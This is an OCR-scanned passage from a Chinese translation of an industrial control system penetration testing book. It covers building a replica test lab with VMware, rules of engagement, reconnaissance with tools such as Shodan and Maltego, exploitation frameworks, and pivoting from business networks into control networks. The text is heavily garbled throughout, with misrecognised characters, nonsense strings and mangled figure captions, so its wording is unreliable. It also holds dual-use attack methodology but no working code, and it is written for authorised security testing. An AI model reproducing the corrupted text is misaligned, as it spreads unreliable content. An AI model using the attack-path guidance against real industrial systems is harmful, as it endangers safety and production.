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我 们 已 经 在 工作 站 上 安装 了 vCenter Converteshiz=Pinttiaaies (需要 使 用 管理 员 模 式 来 运行 该 程序 ) 。 本 例 中 ， 我 们 将 对 本 地 活动 工作 站 进行 转换 。 
然而 ， 在 图 4-1 所 示 的 初始 界面 中 ， 可 以 看 到 其 中 列 出 了 可 以 用 来 创建 虚拟 机 的 各 种 选项 以 及 第 三 方 镜像 。 此 时 所 要 做 的 第 一 件 事 是 单 击 Filel|New|Convert 


Machine...。 


#9 VMware vCenter Converter Standalone 
File View Task Administration Help 


ey Convert machine... Ctrl+M 


ame SOR & Configure machine... Ctr+G ft tasks 


RkD S [Job |source | Destination | Status Starttime | Endtime _ | 


rer 


Welcome to VMware vCenter Converter Standalone 


VMware vCenter Converter Standalone allows you to take one of a variety of machines and convert 
it into a new VMware virtual machine. The machines you may convert include: 


- Physical machines 
Convert -VMware virtual machines (.vmx) 
Machine = _ yMware Consolidated Backup (.vmx) 
- Microsoft Virtual PC or Virtual Server virtual machines (.vmc) 
- Symantec LiveState Recovery Image (.sv2i) 
- Acronis True Image Backup (.tib) 
- StorageCraft ShadowStor (.spf) 
- Parallels Virtualization Products (.pvs) 
- Hyper-V virtual machines 


图 4-1 VMware vCenter 初 始 启 动 界 面 


如 果 不 想 在 要 转换 的 服务 器 或 者 工作 站 上 安装 任何 东西 ， 也 可 以 执行 远程 转换 ， 如 图 4-2 所 示 。 当 然 ， 此 时 需要 远程 计算 机 的 管理 员 认 证 信息 。 需 要 注意 的 


是 ， 远 程 机 器 的 性 能 可 能 会 受到 影响 。 


TJ Conversion 


Source System 
Select the source system you want to convert 


Source System Source: none Destination: none 
Destination System 


Options Select source type: |Powered-on machine | 
summary | Powered-on machine 
VMware Infrastructure virtual machine 
| VMware Workstation or other VMware virtual machine 
Specify the power Backup image or third-party virtual machine 
Hyper-V Server 
C This local machine 


(* A remote machine 
IP address or name: [| 可 
User name: 
Password: | 
OS Family: [Windows "| 


View source details... 


Help | Export diagnostic logs... 


图 4-2 ”选择 远程 转 换 的 远程 源 系 统 


本 例 中 ， 我 们 对 本 地 工作 站 进行 转换 ， 因 此 选择 This Local Machine 选 项 ， 如 图 4-3 所 示 。 


多 Conversion 


Source System 
Select the source system you want to convert 


Source System Source: none Destination: none 
Destination System 


Options Select source type: |Powered-on machine | 
Summary | powered-on machine 
VMware Infrastructure virtual machine 
VMware Workstation or other VMware virtual machine 
Specify the power Backup image or third-party virtual machine 
f Hyper-V Server 
© This local mhe 
C A remote machine 


View source details... 


Help Export diagnostic logs... < Back ||_next > | Cancel | 
| Li 


图 4-3 ”选择 本 地 源 系统 


接 下 来 ， 选 择 所 需 的 向 后 兼容 水 平 。 在 图 4-4 中 ， 我 们 选择 VMware Workstation10.0.x， 但 下 拉 列 表 中 有 多 种 选择 ， 包 括 Vmware Workstation, VMware 
Fusion 以 及 VMware Player 等 选项 。 然 后 对 镜像 进行 命名 并 选择 存储 路 径 。 建 议 使 用 有 足够 空间 来 存储 镜像 的 外 部 存储 设备 ， 如 符合 USB3.0 规 范 的 驱动 外 设 。 


B®) Conversion 


Destination System 
Select a host for the new virtual machine 


Source System Source: = This local machine (Windows 8 (64-bit)) Destination: none 
Options Select destination type: [VMware Workstation or other VMware virtual machine | 


Summary Creates a new virtual machine for use on VMware Workstation, VMware Player, VMware Fusion or 
other VMware product. 


Select VMware product: [VMware Workstation 10.0.x ”| 


Virtual machine details 


Name: [Engineering-Workstation 


Select a location for the virtual machine: 


EA © x) Browse... | 


Help Export diagnostic logs... 


图 4-4 选择 所 需 的 后 向 兼容 水 平 


一 旦 单 击 Next 按 钮 ， 可 以 看 到 很 多 对 镜像 参数 进行 编辑 的 选项 ， 如 图 4-5 所 示 。 有 关 这 些 选 项 的 更 多 细节 请 参阅 VMware 文 档 。 但 是 ， 此 时 没有 必要 对 任何 
参数 进行 编辑 ， 因 为 即使 镜像 已 被 导入 到 虚拟 环境 中 了 ， 稍 后 也 可 以 对 相关 参数 进行 编辑 。 当 再 次 单 击 Next 按 钮 时 ， 束 会 看 到 该 转换 项 目的 概要 。 单 击 Finish 按 
钮 就 可 以 开始 转换 过 程 了 。 


在 将 新 镜像 导入 到 ESX 环 境 之 前 ,需要 将 其 导出 保存 为 开放 虚拟 化 格式 (Open Virtua-lization Format, OVF) 的 文件 。 为 此 ， 在 VMware Workstation 中 
打开 所 选择 的 镜像 (确保 选择 的 是 向 后 兼容 的 版 本 ) ， 单 击 File 菜 单 ， 然 后 骨 单 击 Export to OVF...， 如 图 4-6 所 示 。 一 旦 选择 了 一 个 文件 位 置 ， 那 么 OVF 文 件 惑 
被 保 仓 在 那里 。 当 保存 过 程 结 束 后 ， 融 可 以 将 新 保存 的 OVF 镜 像 导 入 到 ESX 环 境 中 ， 或 者 任何 其 他 文 持 OVF 格 式 的 虚拟 化 平台 。 


如 果 要 将 镜像 从 vsSphere 客 户 端 导 入 到 ESX 环 境 ， 可 以 单 击 File 荣 单 ， 然 后 再 单 击 Deploy OVF Template...， 如 图 4-7 所 示 。 


EJ Conversion 


Options 
Set up the parameters for the conversion task 


Source System Source: i This local machine (Windows 8 (64-bit)) Destination: 内 E:\ (VMware Workstation 10.0.x) 
-一 一 一 一 一 一 Click on an option below to edit it. 

Y Devices 
vCPUs: 8 (1 sockets * 8 cores) 
Disk controller: SCSI LSI Logic SAS 
A Memory: 23GB 

Y Networks 
NIC1: Bridged 
NIC2: Bridged 
NIC3: Bridged 
NIC4: Bridged 
Total: 247 service(s) 

v Advanced options 
Synchronization: Disabled 
Synchronize: N/A 
Final synchronization: N/A 
Instal VMware Tools: No 
Customize Guest OS: No 
Remove Restore Checkpoints: Yes 
Reconfigure: Yes 

Y Throttling 
CPU: None 
Network bandwidth: None 


Help Export diagnostic logs... 


g Engineering-Workstation - VMware Workstation 


File | Edit View VM Tabs Help 


{New Virtual Machine... Ctrl+N 
ta New Window 
Open... Ctri+ 0 
Close Tab Ctri+ W 


a Connect to Server... Ctrl+L 
Zs, Virtualize a Physical Machine... 
E Map Virtual Disks... 


Exit 
[J Processors 2 
GA Hard Disk (SCSI) 60GB 
y CD/DVD (IDE) Auto detect 
lal Floppy Auto detect 
Ta Network Adapter Bridged (Autom... 
USB Controller Present 
d) Sound Card Auto detect 
dæ Printer Present 
Display Auto detect 


+ Description 
Type here to enter a description of this 
virtual machine. 


? Virtual Machine Details TT 


图 4-6 FR ERE 


File | Edit View Inventory Administration Plug-ins Help 


aif 


Perrormance 


Print Maps 
| What is a Host? 


* A host is a computer that uses virtualization software, such 
as ESX or ESXi, to run virtual machines. Hosts provide the 
CPU and memory resources that virtual machines use and 
give virtual machines access to storage and network 
connectivity. 


Exit 


You can add a virtual machine to a host by creating a new 
one or by deploying a virtual appliance. 


The easiest way to add a virtual machine is to deploy a 
virtual appliance. A virtual appliance is a pre-built virtual 
machine with an operating system and software already 
installed. A new virtual machine will need an operating 
system installed on it, such as Windows or Linux. 


图 4-7 将 镜像 导入 到 ESX 环 境 


443 ”装备 


无 论 是 机 构 内 部 的 渗透 测试 团队 还 是 为 客户 开展 渗透 测试 的 第 三 方 公司 ， 准 备 并 部 署 复 制 的 测试 环境 都 是 非常 重要 的 。 与 其 期 待 基 础 设施 能 够 提供 对 测试 环 
境 的 支持 ， 我 们 强烈 建议 搭建 一 个 能 够 对 多 种 不 同 环境 提供 支持 的 实验 环境 。 


其 中 一 种 解决 方案 是 使 用 Amazon Web Services (AWS) 。AWs 是 一 种 云 环境 ， 能 够 灵活 地 实现 对 多 人 台 主 机 与 网 络 的 配置 。 但 是 ， 用 户 当 前 所 处 的 位 置 未 
必 能 够 访问 也 未 必 人 允许 访问 互联 网 ， 而 同 本 地 物理 设备 的 连接 也 会 提高 复杂 性 并 引 友 其 他 问题 。 


在 这 种 情况 下 ， 我 们 通常 采用 如 图 4-8 所 示 的 部 署 方 案 ， 该 方案 是 一 套 将 虚拟 主机 与 物理 设备 相 结 合 的 便携 式 机 架设 备 。 


ce. ck ek Reece 
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图 4-8 BARE A RIEN REA A 


所 有 设备 都 封闭 人 在 Pelican Hardigg BBOOSOBlackBox9UAMIRAIHL, AMMAS TESE, ARREARS T EP, EE 
出 了 充足 的 扩展 空间 。 如 果 想 要 外 形 更 加 轻 湾 ， 空 间 只 需 容 纳 核心 设 备 即 可 ， 那 么 可 以 选择 4U 的 型 号 ;又 或 者 需要 更 多 的 扩展 性 ， 例 如 需要 将 PLC 以 及 其 他 设备 
部 署 到 机 架 中 ， 那 么 就 可 以 选择 14U 的 型 号 。 思 科 3750g 系 列 交 换 机 能 够 以 干净 网 速 连接 物理 设备 ， 规 格 为 1U 的 轻便 的 HP ProLiant DL360G9 服 务 器 则 可 以 为 虚 
拟 服务 器 提供 运算 内 核 。 该 服务 器 配置 如 下 : 


2 片 英特尔 至 强 处 理 器 E5-2697V3 (35M 缓 存 ，2.60GHZz) ， 可 提供 24 颗 可 用 内 核 
- 256GB DDR4 内 存 (16DIMM16GB2Rx4pc4-2133) 

5 块 SFF400gb SAS 固 态 硬盘 ， 可 提供 2T 的 强大 固态 存储 能 

- VMware ESXi/vSphere6 作 为 虚拟 服务 器 平台 


该 服务 器 配置 具备 充足 的 处 理 能 力 、 内 核 数量 、 内 存 容量 以 及 存储 能 力 ， 几 乎 能 够 对 可 能 遇 到 的 所 有 虚拟 主机 与 网 络 环境 进行 仿真 。 固 态 硬盘 针对 运输 途中 
可 能 出 现 的 颠 艇 提供 了 额外 保护 。 当 需要 将 其 连接 到 另 一 网 络 或 者 互联 网 时 ， 由 Cisco ASA5512 防 火 墙 来 提供 网 络 隔离 、 以 及 远程 访问 时 所 需 的 VPN 功 能 。 最 
Ja, Tripp Lite 公 司 型 号 为 RS-1215-20-al1 规 格 为 1U 的 电源 插 排 为 内 部 和 外 部 的 电源 连接 提供 了 12 个 电源 插座 。 这 套 部 署 方 式 总 共 占 用 了 4U 空 间 ， 还 剩 下 5U 空 间 
可 以 进行 扩展 。 在 这 种 情况 下 ， 还 可 以 安装 背 板 ， 从 而 添加 一 个 DIN 导 轨 或 者 其 他 可 以 硬 安装 的 设备 ， 例 如 PLC。 


通过 新 型 购物 方式 一 eBay 进 行 在 线 及 购 以 及 一 番 讨 价 还 价 ， 只 需要 15000 美 元 甚至 更 少 的 投入 束 可 以 完成 上 述 设 置 。 而 对 于 个 人 来 说 ， 这 个 价格 可 能 有 点 
高 ， 但 是 作为 一 套 专 业 沪 备 ， 以 这 个 价格 部 署 一 套 渗透 测试 实验 环境 则 物 有 所 值 ! 可 以 方便 地 将 装备 打包 、 上 锁 ， 然 后 安全 地 运送 到 客户 现场 。 如 果 需 要 运行 客 
户 系 统 的 虚拟 仿真 ， 那 么 这 套装 备 提供 了 所 有 需要 的 资源 和 基础 设施 ， 而 不 必 依 赖 于 客户 提供 服务 器 和 工作 站 硬件 ， 甚 至 还 可 以 复制 环境 然后 搬 回 到 自己 的 实验 
环境 (只 要 客户 允许 ) 进行 异地 测试 。 


4.5 -测试 规则 


渗透 测试 项 目 中 需要 最 先 考 虑 的 、 同 时 也 是 最 重要 的 方面 之 一 ， 束 是 测试 规则 (rules of engagement) 。 尤 其 对 于 工控 系统 环境 而 言 ， 这 种 表述 再 准确 不 
过 了 。 测 试 规则 介绍 了 在 不 中 断 操作 的 情况 下 ， 哪 些 方 法 和 技术 是 允许 的 ， 哪 些 方法 和 技术 是 不 允许 的 。 出 于 功能 安全 与 生产 保障 的 目的 ， 这 些 测试 规则 是 工控 
系统 渗透 测试 项 目的 基石 。 每 个 渗透 测试 项 目的 测试 规则 都 是 不 同 的 ， 需 要 根据 项 目 、 系 统 以 及 机 构 的 需求 和 要 求 来 确定 。 


在 大 多 数 工 控 系 统 渗透 测试 项 目 中 都 会 制订 测试 规则 对 生产 系统 进行 保护 ， 下 面 是 部 分 最 常用 的 测试 规则 示例 列表 (包括 但 不 限于 ) : 
不 得 针对 生产 设备 、 装 置 、 服 务 器 或 工作 站 开展 拒绝 服务 (DoS) 测试 。 


` 如 果 需 要 对 生产 系统 进行 端口 扫描 ， 那 么 应 该 每 次 只 针对 一 台 设 备 或 者 计算 机 进行 扫描 ， 扫 描 速 度 不 得 影响 网 络 性 能 ， 并 且 每 次 只 能 针对 目标 端口 中 的 部 


分 端口 进行 扫描 。 


需要 记 住 的 是 ， 类 似 Nmap 之 类 的 扫描 工具 可 能 会 对 很 多 控制 系统 设备 造成 不 良 影响 。 这 方面 的 示例 在 第 一 部 分 开头 的 第 一 个 案例 研究 中 已 经 讨论 过 了 ， 而且 


在 我 和 几 位 渗透 测试 人 员 以 及 操作 人 员 的 交流 过 程 中 ， 发 现 确实 存在 由 于 对 工控 系统 网 络 进行 端口 扫描 导致 设备 运行 中 断 的 情况 。 


niet 


KAE 
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' 不 得 针对 生产 设备 或 装置 开展 基于 内 存 漏洞 的 漏洞 利用 。 
* 不 得 针对 生产 系统 或 设备 开展 数据 包 重 放 、 数 据 包 鞭 改 以 及 主动 中 间 人 (MiTM) 攻击 。 


` 如 果 成 功 连接 生产 设备 、 装 置 、 工 作 站 或 服务 器 ， 不 得 尝试 鞭 改 生产 数据 、 设 定点 、 配 置 、 逻 辑 以 及 图 形 界面 。 


46 ”风险 场景 的 运用 


一 个 渗透 测试 项 目 包含 如 此 多 的 要 素 、 攻 击 向 量 以 及 可 以 尝试 的 方法 ， 因 此 如 果 不 对 攻击 过 程 进行 预先 规划 ， 那 么 渗透 测试 将 变 得 相当 难以 开展 。 借 助 在 威 
胁 建 模 步 骤 (在 前 面 第 3 章 中 讨论 过 ) 中 构建 的 风险 场景 有 助 于 提出 针对 性 的 方法 ， 将 其 与 测试 规则 相 结 合 ， 也 能 够 使 客 尸 更 加 放心 ， 因 为 这 样 客 户 束 知道 对 工控 
系统 的 测试 将 遵循 一 组 严格 的 参数 设置 和 指导 方针 。 


如 果 想 进行 “黑金” 测试 ， 那 么 风险 场景 应 该 由 承担 本 次 项 目的 测试 团队 之 外 的 团队 来 构建 ， 而 所 构建 的 场景 在 工作 和 测试 规则 的 范围 内 应 该 是 客观 的 。 否 
则 ， 通 过 搜集 风险 场景 构建 过 程 中 的 相关 数据 所 了 解 到 的 信息 ， 将 使 得 测试 过 程 对 于 测试 团队 而 言 成 为 “ 灰 鲍 测试 ”甚至 是 “和 白 鲍 测试 ”。 


47 TASS Mic: MARE 


除了 测试 规则 ， 区 分 工控 系统 渗透 测试 项 目 同 传统 业务 IT 渗透 测试 项 目的 另 一 个 关键 方面 是 特殊 的 测试 策略 。 这 些 策 略 同 工 控 系统 、 应 用 程序 、 协 议 以 及 设 
备 的 具体 设计 和 功能 有 关 ， 而 且 测 试 策 略 还 需要 利用 设计 与 功能 中 的 缺陷 、 弱 点 以 及 脆弱 性 。 重 要 的 是 要 确保 所 有 渗透 测试 结果 确实 能 够 构成 工控 系统 环境 中 有 
效 、 真 实 的 风险 。 例 如 ， 仅 仅 获 得 对 特定 资产 的 访问 权限 ， 或 者 没有 连通 到 关键 系统 的 通信 路 径 ， 对 天 键 系统 而 言 几乎 并 不 仔 在 什么 影响 ， 因 此 除了 将 该 特定 资 
产 和 (或 ) 通信 路 径 标 记 为 低 风 险 之 外 ， 其 对 风险 评估 结果 的 整体 价值 贡献 很 少 。 测 试 策略 以 及 采用 该 策略 友 现 的 问题 只 有 能 够 构成 现实 中 的 成 功 攻击 ， 对 功能 
安全 、 生 产 或 者 品牌 声誉 造成 了 负面 甚至 严重 影响 时 ， 那 么 测试 策略 以 及 采用 该 策略 友 现 的 问题 才 有 价值 。 针 对 工控 系统 的 测试 策略 在 后 面 的 章节 中 都 有 实例 进 
行 解释 。 需 要 记 住 的 是 ， 上 述 内 容 是 测试 策略 ， 而 不 是 分 步 指 导 。 在 后 面 的 章节 中 会 就 漏洞 利用 技术 展开 详细 讨论 。 


无 论 是 对 业务 IT 网 络 还 是 工控 系统 展开 渗透 测试 ， 所 涉及 的 底层 专业 技能 都 是 相同 的 。 例 如 ， 在 渗透 测试 过 程 的 基本 阶段 ， 需 要 熟练 掌握 Linux 操 作 系 统 、 编 
程 技巧 、 漏 洞 利 用 工具 开发 以 及 常用 工具 的 使 用 技能 。 无 论 每 个 人 的 学 科 专 业 是 什么 ， 对 于 所 有 渗透 测试 人 员 而 言 的 要 求 都 是 一 样 的 。 对 工控 系统 进行 渗透 测试 
的 区 别 在 于 测试 人 员 对 这 些 系统 的 理解 、 所 使 用 的 具体 策略 ， 以 及 必须 遵循 的 预防 措施 。 如 果 刚 刚 接触 到 渗透 测试 ， 本 章 结 尾 推 荐 了 延伸 阅读 ， 将 有 助 于 读者 以 
自己 的 方式 来 学 习 所 需 的 渗透 测试 技能 和 技术 。 


G5 


强烈 建议 使 用 工具 来 帮助 组 织 渗 透 测试 的 结果 ， 以 及 协同 团队 中 各 种 信息 的 交互 。 工 具 能 够 对 后 续 渗透 测试 报告 的 撰写 提供 帮助 ， 防 止 出 现 重 复 性 工作 或 者 


造成 问题 的 遗漏 。MagicTree (http://www.gremwell.com/what_is_magictree) 和 Dradis (http://dradisframework.org/) 就 是 两 款 专 门 为 此 而 设计 的 工具 。 


4.7.1 侦察 (“ 蹊 点 ”) 


在 互联 网 上 搜索 天 于 目标 对 象 的 有 用 信息 (也 称 为 踩点 ) 是 渗透 测试 过 程 中 的 一 个 重要 步 妊 ， 也 是 为 后 续 渗 透 策略 的 选择 提供 数据 支撑 的 整个 过 程 中 重要 的 
组 成 部 分 之 一 。 侦 察 过 程 能 够 提供 信息 帮助 制订 后 续 攻 击 方案 的 实施 ， 而 在 工控 系统 渗透 测试 方面 ， 所 获取 的 信息 则 为 处 理 环境 如 何 工作 以 及 使 用 了 哪些 系统 等 
问题 提供 了 线索 。 


同 其 他 渗透 测试 相 比 ， 工 控 系 统 侦察 过 程 中 所 需要 的 技巧 以 及 所 使 用 的 技术 没有 什么 不 同 ， 都 包括 对 公司 信息 的 研究 、 同 目标 相 天 的 I|P 地 址 块 以 及 URL 的 探 
测 。 但 是 ， 其 中 有 些 工 具 和 方法 在 此 需要 特别 指出 ， 因 为 这 些 工具 和 方法 对 于 工控 系统 渗透 测试 尤为 有 效 : 


- 探测 脚本 Chetps://github.com/leebaird/discover) 使 得 通常 由 人 工 完成 的 OSINT (Open Source Intelligence， 开 源 情报 ) 调查 搜集 工作 得 以 自动 化 完成 。 探 测 
脚本 能 够 实现 检查 whois 信 息 、 查 找 子 域名 和 主机 、 搜 集 用 户 名 和 电子 邮件 地 址 、 挖 掘 社 交 媒 体 的 交叉 引用 信息 等 诸多 功能 ， 所 有 这 些 功能 均 可 以 在 一 个 脚本 中 完 
成 。 重 要 的 是 在 工控 系统 渗透 测试 中 只 能 运行 被 动 式 侦 察 脚 本 。 因 为 主动 式 侦察 脚本 可 能 会 对 生产 环境 造成 威胁 。 


- Google hacking 数 据 库 (还 有 几 个 类 似 的 数据 库 ， 可 以 尝试 使 用 Google 搜 索 一 下 ) 以 及 人 工 Google hacking (现在 被 称 为 Google dorking) ， 都 在 Johnny Long, 
Bill Gardnet 以 及 Justin Long 编 著 的 《Google Hacking for Penetration Testers, Third Edition (Syngress, 2015) 由 一 书 中 进行 了 介绍 ， 通 过 这 两 种 方法 都 能 够 帮助 找到 
与 工控 系统 有 关 的 URL、 文 件 及 其 他 信息 等 线索 ， 有 时 通过 这 些 信息 甚至 能 够 直接 访问 到 工控 系统 (或 者 与 之 相 邻 的 网 络 ) 。 


` Maltego 工 具 (https://www.paterva.com/web6/products/maltego.php) 使 得 侦察 过 程 中 的 很 多 任务 得 以 自动 化 执行 。 在 给 定 初始 起 点 的 情况 下 ， 例 如 一 个 IP 地 
址 ， 或 者 一 个 电子 邮件 地 址 ，Maltego 能 够 在 互联 网 (包括 网 站 、 论 坛 、 社 交 媒 体 、Twittet 等 ) 中 围绕 初始 起 点 搜索 所 有 与 之 相关 的 内 容 。 就 像 Google hacking 一 
样 ， 其 目标 都 是 找 出 能 够 为 网 络 架 构 和 【或 ) 用 于 社会 工程 学 的 数据 提供 进一步 线索 的 信息 。 


- Shodan 搜 索引 擎 Chttps://www.shodan.io/) 最 神奇 的 互联 网 工具 之 一 。Shodan 是 一 个 专门 设计 用 来 查找 面向 互联 网 的 设备 的 在 线 搜索 引擎 ， 还 可 以 用 于 搜索 
面向 互联 网 的 工控 系统 设备 。 行 业 中 的 部 分 人 士 可 能 都 没有 听 说 过 这 种 方式 ， 但 是 实际 上 通过 这 个 搜索 工具 发 现 的 面向 互联 网 的 工控 系统 设备 数量 相当 惊人 。 
SHINE A (http://www.securityweek.com/project-shine-reveals-magnitude-internet-connected-critical-control-systems) 的 研究 成 果 表 明 面 向 互联 网 的 工控 系统 设备 数量 
超过 了 1，000，000 台 (是 的 ， 是 100 万 ， 没 有 打 错 ) 。 顺 便 提 一 句 ， 也 可 以 将 Shodan 搜 索引 擎 看 作 是 一 套 持 续 运 行 的 防御 工具 。 我 有 一 个 客户 利用 Shodan API 实 现 
了 对 自身 工控 系统 设备 的 定期 监测 ， 一 旦 有 自家 工控 系统 设备 出 现在 搜索 结果 中 就 可 以 迅速 捕获 到 该 设备 。 


4.7.2 ”外 部 测试 


外 部 渗透 测试 是 指 从 互联 网 对 面向 互联 网 的 环境 进行 渗透 测试 。 测 试 对 象 既 包括 传统 业务 1 系统， 也 包括 工控 系统 。 然 而 ， 即 便 可 以 从 互联 网 直接 访问 生产 
工控 系统 的 网 络 和 设备 ， 也 要 避免 针对 这 些 网 络 和 设备 进行 主动 渗透 测试 ， 我 们 在 这 里 所 要 讨论 的 是 一 个 通用 策略 ,该 策略 使 用 面向 互联 网 的 邻接 网 络 作 为 进 
工控 系统 网 络 的 路 径 ， 例 如 业务 网 络 。 (针对 工控 系统 网 络 和 设备 开展 渗透 测试 的 细节 将 在 以 后 的 章节 中 详细 讨论 ， 这 些 内 容 也 适用 于 面向 互联 网 的 设备 。) 其 
思路 是 ， 在 没有 面向 互联 网 的 工控 系统 网 络 和 设备 的 情况 下 (本 来 应 该 是 这 种 情况 ) ， 攻 击 者 尝试 获取 其 他 业务 网 络 的 访问 权限 ， 然 后 通过 连通 的 路 径 以 这 些 网 
络 同 工 控 系 统 网 络 交 互 的 方式 进入 到 工控 系统 网 络 当中 。 恶 意 代 码 Havex 惑 是 这 样 一 个 借助 业务 网 络 对 工控 系统 网 络 构成 威胁 的 例子 (正如 在 第 1 章 和 第 8 章 所 讨 
论 的 内 容 一 样 ) 。 


如 前 所 述 ， 无 论 对 什么 环境 进行 渗透 测试 ， 外 部 渗透 测试 所 需要 的 基本 技能 都 是 相同 的 ， 它 们 通常 包括 但 不 限于 以 下 常见 的 方法 和 工具 集 
* 标准 渗透 测试 方法 和 技巧 : 

-踩点 〈 侦察 ) 

` 主机 探测 、 端 口 扫 描 和 服务 枚 举 

` 脆弱 点 映射 (将 所 发 现 的 服务 与 版 本 同 已 知 的 脆弱 点 进行 匹配 ) 

已 知 漏洞 的 利用 (也 可 能 包括 汤 洞 利用 工具 的 开发 、 测 试 与 调试 ) 

"0-day 漏洞 的 挖掘 与 利用 (依赖 于 范围 和 时 间 ， 因 为 这 需要 更 加 专业 和 先进 的 技能 

` 常用 渗透 测试 工具 : 


- Kali Linux 的 设计 目标 是 成 为 一 套用 来 进行 渗透 测试 的 专用 Linux 版 本 ， 其 中 包含 了 几乎 任何 渗透 测试 任务 中 都 需要 用 到 的 大 部 分 工具 
(https://www.kali.org/) 。 


Kali 中 工具 的 完整 列表 (这 通常 也 是 较为 全 面 的 渗透 测试 工具 列表 ) 根据 类 别 在 http://tools.kali.otg/tools-listing 中 列 出 


- SamuraiSTFU (http://www.samuraistfu.org/) 是 一 套 类 似 于 Kali 的 用 于 渗透 测试 的 Linux 发 行 版 ， 但 其 专门 用 于 针对 工控 系统 环境 进行 渗透 测试 。 


透 测 试 与 漏洞 利用 框架 是 渗透 测试 的 核心 组 件 。 善 用 框架 能 够 节省 渗透 测试 的 时 间 ， 提 高 渗透 测试 的 自动 化 程度 ， 同 时 将 测试 过 程 中 需要 的 众多 工具 
(包括 漏洞 利用 工具 的 开发 ) 进行 自动 化 集中 存储 。 当 前 每 个 框架 都 提供 了 针对 工控 系统 和 SCADA 系 统 的 漏洞 利用 工具 。 


- Metasploit (https://www.metasploit.com/) 漏洞 利用 框架 最 初 的 “先驱 者 ”， 并 被 看 作 是 行业 标准 ， Metasploit 提 供 免 费 版 与 商业 版 两 种 版 本 。 


- CORE Impact (https://www.coresecurity.com/core-impact) 商业 渗透 测试 与 漏洞 利用 框架 ， 功 能 与 Metasploit 类 似 。Impact 售 价 高 ， 但 是 对 于 拥有 充足 预算 的 
专业 渗透 测试 团队 而 言 是 首选 框架 。 


- Immunity CANVAS (https://www.immunityinc.com/products/canvas/index.html) 商业 渗透 测试 与 漏洞 利用 框架 ， 功 能 与 Metasploit 类 似 。 同 Impact 一 
样 ，CANVAS 售 价 也 比较 高 ， 但 也 是 拥有 充足 预算 的 专业 渗透 测试 团队 的 首选 。 


- Exploit Pack (http://exploitpack.com/) 渗透 测试 与 漏洞 利用 框架 家 族 中 最 年 轻 的 成 员 。 Exploit Pack 售 价 适 中 ， 其 精良 的 界面 与 强大 的 功能 足以 同 售 价 更 高 
的 竞争 对 手相 媲美 ， 因 此 具有 很 大 的 发 展 潜力 ， 同 时 其 漏洞 利用 工具 库 也 在 不 断 进 行 扩充 。 


- 在 Kali Linux 中 未 集成 的 常见 0-day 挖 掘 和 逆向 工程 工具 : 

- BAL i Fe WIA (edb, IDA Pro, Immunity Debugger、WinDbg) 
- 模糊 测试 工具 (Sulley. Peach Fuzzer, Codenomicon) 

数据 包 构 造 与 操作 工具 (Scapy. Nping, Netcat) 


需要 指出 的 是 ， 除 了 当前 已 有 的 众多 酷 烽 工 具 和 技术 ， 根 据 我 们 的 经 验 ， 工 控 系 统 环境 中 最 成 功 的 攻击 向 量 还 包括 保护 不 到 位 的 工作 站 ， 它 们 的 口令 强度 通 
常 很 低 ， 很 容易 进行 猜 解 、 爆 破 或 者 直接 暴力 攻击 ;远程 访问 服务 ， 例 如 远程 桌面 协议 (Remote Desktop Protocol, RDP) 及 SSH; 以 及 社会 工程 学 技术 。 所 
有 这 些 表 明 ， 只 要 员工 是 链条 中 最 薄弱 的 环节 ， 那 么 世界 上 所 有 通过 技术 实现 的 安全 保障 与 补丁 修复 都 难以 保障 系统 的 安全 。 第 1 章 中 提 到 的 针对 德国 钢铁 三 的 攻 
击 就 以 社会 工程 学 (钓鱼 ) 方式 作为 初始 攻击 向 量 。 


4.7.3 ”跳板 攻击 


现在 在 渗透 测试 中 ， 根 据 测试 规则 项 目 需要 根据 以 下 的 过 程 与 场景 分 别 进行 : 
+ 如 果 测 试 人 员 能 够 从 互联 网 访问 内 网 
续 持 续 尝试 访问 内 网 
- 暂停 当前 测试 ， 在 网 络 内 部 选 定 起 点 重新 开始 新 的 渗透 测试 项 目 
如 果 测 试 人 员 不 能 够 从 互联 网 访问 内 网 


赋予 渗透 测试 人 员 内 网 访问 权限 ， 重 新 开始 渗透 测试 ， 就 好 像 渗 透 测 试 人 员 能 够 从 互联 网 实现 对 内 网 的 访问 (这 是 为 了 保证 测试 过 程 将 内 部 威胁 之 类 的 要 
素 考 虑 在 内 ， 而 不 仅仅 局 限于 对 网 络 边 界 的 测试 ) o 


早先 我 们 讨论 过 使 用 邻接 网 络 ， 例 如 业务 网 络 作为 获取 工控 系统 网 络 访问 权限 的 一 种 方式 。 术 语 跳板 攻击 (Pivoting) 指 的 是 将 一 个 已 被 入 侵 的 系统 作 
为 “中 继 ”， 从 而 在 网 络 中 开展 进一步 攻击 。 跳 板 攻 击 之 所 以 有 效 并 且 能 够 友 挥 作用 的 原因 在 于 ， 它 使 得 攻击 者 无 需 在 被 入 侵 的 系统 中 下 载 额 外 的 工具 。 这 一 策 
略 通 常 使 得 检测 更 加 复杂 ， 例 如 1DS 可 以 检测 到 额外 的 网 络 流量 ,然后 阻止 该 危险 行为 ， 反 病毒 解决 方案 及 其 他 各 种 限制 也 可 以 阻止 某 些 工具 的 安 沪 。 而 跳板 攻击 
人 允许 攻击 者 将 被 入 侵 系统 作为 中 继 ， 其 实质 上 相当 于 一 个 路 由 器 ， 进 而 在 内 部 网 络 中 继续 开展 攻击 ， 同 时 可 以 使 用 其 初始 攻击 平台 中 的 所 有 工具 。 


我 们 的 策略 主要 关注 于 获取 工控 系统 网 络 的 访问 权限 。 根 据 大 多 数 工 业 安 全 标准 ， 尤 其 是 第 1 章 中 图 1-2 提 到 的 普 渡 参考 模型 ， 网 络 架 构 仅 应 当 将 工控 系统 网 
络 同 其 他 网 络 区 域 分 隔 开 来 ， 而 且 也 不 应 该 允许 数据 从 高 级 别 区 域 (第 4 层 与 第 5 层 ) 流向 低级 别 区 域 (第 0 层 至 第 3 层 ) ， 同 时 在 未 建立 “可 信 管道 ” 的 情况 下 ， 
应 禁止 区 域 3 与 区 域 4 之 间 数 据 的 直接 流动 ， 这 些 通常 是 借助 DMZ 区 来 实现 的 。 


但 是 ， 该 安全 策略 仍然 具有 局 限 性 ， 因 为 邻接 网 络 是 针对 工控 系统 网 络 的 一 个 可 行 的 攻击 向 量 : 
. 工控 系统 的 网 络 架构 师 并 不 总 是 遵循 网 络 隔离 的 原则 以 及 数据 通信 标准 (而 且 我 们 发 现 这 种 现象 非常 普遍 ) 。 


.工程师 经 常 通过 搭建 双 和 宿主 工作 站 〈 人 安装 双 网 卡 的 工作 站 ， 一 块 网 卡 连接 到 工控 系统 网 络 ， 男 一 块 连接 到 邻接 网 络 ， 从 而 有 效 地 规避 防火 墙 ) 来 绕 过 这 些 
限制 。 


£ = O 1 
